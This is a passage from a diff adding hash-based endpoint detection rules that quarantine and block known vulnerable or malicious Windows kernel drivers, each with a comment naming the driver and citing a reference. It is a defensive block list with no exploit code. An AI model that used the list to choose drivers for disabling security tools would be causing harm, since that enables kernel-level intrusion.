+ "value": "675329ef7a63a7c58d3daa6cb5c6e299143decec7a149c36a6bfe204bbf0407e",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb28a922-db4f-5b1b-84b2-1738be63df28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613206Z",
+ "creation_date": "2026-03-23T11:45:29.613208Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613214Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dc8a1cf5402f95d61662531507b12b04e16922eb89108eb751d1c634d475ef67",
+ "comment": "Gigabyte vulnerable driver (aka GVCIDrv64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb28b8b6-3c07-5adb-8278-50b73fb3f61c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141486Z",
+ "creation_date": "2026-03-23T11:45:31.141488Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141494Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b61f69d9c11487bf5852e63d9980b5577ef44ef180933681d0b0a187bed81ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb2b968e-c2da-5fd6-b58f-4c50a844a99f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484720Z",
+ "creation_date": "2026-03-23T11:45:31.484724Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cc991132e6a0dfc648a2f4ac73e97af26eec1f90372236df6d539b972e06a2b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb39c2ca-80f5-58c5-9555-b265aa40d27d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835490Z",
+ "creation_date": "2026-03-23T11:45:30.835493Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835502Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "234ed5418a8db6f989add54ef8823eb1b2e8e73b0cff0716d0554fbc4490acbf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb4bb953-609d-5e38-a217-c30c06a53386",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478133Z",
+ "creation_date": "2026-03-23T11:45:30.478136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478145Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c812acb46a9d4b224cc20c70aeca969b00521123008cff8b1eb0367fdb0fc6b",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb659702-9041-585e-8777-c89347646f73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622967Z",
+ "creation_date": "2026-03-23T11:45:29.622969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8bf3bd441ebc5814c5d39d053fdcb263e8e58476cbdee4b1226903305f547b6",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb65b31f-dfdb-5b49-bc2b-23a672caa6fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828029Z",
+ "creation_date": "2026-03-23T11:45:30.828031Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828037Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea9506eab19fbc25589a5e9058bb8be8c934ea88ab9ac62bee82627147e8506b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb716ac5-156b-5b0b-9c6c-8b788c89bdbc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480979Z",
+ "creation_date": "2026-03-23T11:45:31.480983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95e37414577d94a018dd2da7f59a835b0619b4c40068e717cb4ce4bd5137ab0a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb79aa74-d622-5b62-8cff-806de0e17034",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142892Z",
+ "creation_date": "2026-03-23T11:45:31.142894Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142899Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c286d288c474ffb42d80fcc692ff747c51275c34653f5b1c63f1e75de378d8c7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb7a572b-69ff-5d56-8b43-5c27f208735c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144447Z",
+ "creation_date": "2026-03-23T11:45:32.144449Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144455Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37206b758eac2c7775ef881c1dc9a96129a517069bdf47049afc3b29e328408e",
+ "comment": "Vulnerable Kernel Driver (aka ProcObsrvesx.sys) [https://www.loldrivers.io/drivers/8a1a4a5d-3e41-4539-80cd-0cb751f7fab3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb8d06a9-8762-5ff2-a81f-94784b930102",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807502Z",
+ "creation_date": "2026-03-23T11:45:31.807504Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807510Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e42755c0f27c6a89c6f101d28b0b43ca2899d543db85411a38449b96a9d49e5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb944f3b-9895-5756-8ca4-93da3c9ef924",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455275Z",
+ "creation_date": "2026-03-23T11:45:30.455279Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455287Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0391107305d76eb9ddf1a5b3b3c50da361e8ab35b573dbd19bf9383436b9303e",
+ "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb95ca08-7baf-5987-b7a3-b895aea9dfb6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611619Z",
+ "creation_date": "2026-03-23T11:45:29.611621Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611629Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62daa7ab93684d935cdada8af43cba552d7692cb992411d27ba1ee50a9fb1883",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cb9c32ac-6f4b-5989-92f0-7e050265dc8e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827367Z",
+ "creation_date": "2026-03-23T11:45:31.827369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8427775632e60b14264ada48a86c7f59fde2f4e5cbc46cf4768c87cf7ad5a84b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cba77143-c52c-5e2d-aaca-109fa5f1ce47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154431Z",
+ "creation_date": "2026-03-23T11:45:31.154433Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154438Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c36037dedb296b6746f6ac6eea9b1a6eaa46eba4c49da895bcac79c39269a584",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cbaaa024-cffd-52cf-ad0b-c8116f0f0195",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491902Z",
+ "creation_date": "2026-03-23T11:45:31.491904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ecceaf72e18dba67f0537b50ff56b9dd2643616a27a22b8be498d2cd7de9a2c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cbba6613-b8c4-59cb-91e1-6894293cbbcc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471912Z",
+ "creation_date": "2026-03-23T11:45:30.471915Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471925Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65e3548bc09dffd550e79501e3fe0fee268f895908e2bba1aa5620eb9bdac52d",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cbc35264-0230-534d-a3ea-7b5aa9697ae7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154935Z",
+ "creation_date": "2026-03-23T11:45:31.154938Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154943Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b16be2f9bfc6ba39d29e5aa1f82e035f303d8e246f5f06a2be12435eea5336e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cbd1f43e-f659-5525-85e0-11b851834a3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143448Z",
+ "creation_date": "2026-03-23T11:45:32.143450Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "06967882fae2160cec07ea7b31685deefc61e1e6153ed8e87ee8a1f7086afc5b",
+ "comment": "Vulnerable Kernel Driver (aka GPU-Z.sys) [https://www.loldrivers.io/drivers/0d6f1b0f-b94d-4254-b3bb-49de61246260/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cbd58266-f777-5dee-8499-06aea4427b09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476616Z",
+ "creation_date": "2026-03-23T11:45:30.476619Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476629Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d4cb02a826973521678309a0076b2fd50894c09dda87ca86089e815f4bc9bce",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cbdbe2c5-110c-59a6-94aa-9d8b0b5b51a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160605Z",
+ "creation_date": "2026-03-23T11:45:31.160607Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160613Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f6c9e43cb8e6af24315f57b638253c1d7f33793fdd879e6fb37a0e16b5a124b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "cbec168d-3db5-55df-aca8-f58e7124e4a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822800Z",
+ "creation_date": "2026-03-23T11:45:30.822802Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822807Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1a34446a3d8b2875a505b109a1c78177f9fa887472699ec9db5147b1074e42f",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
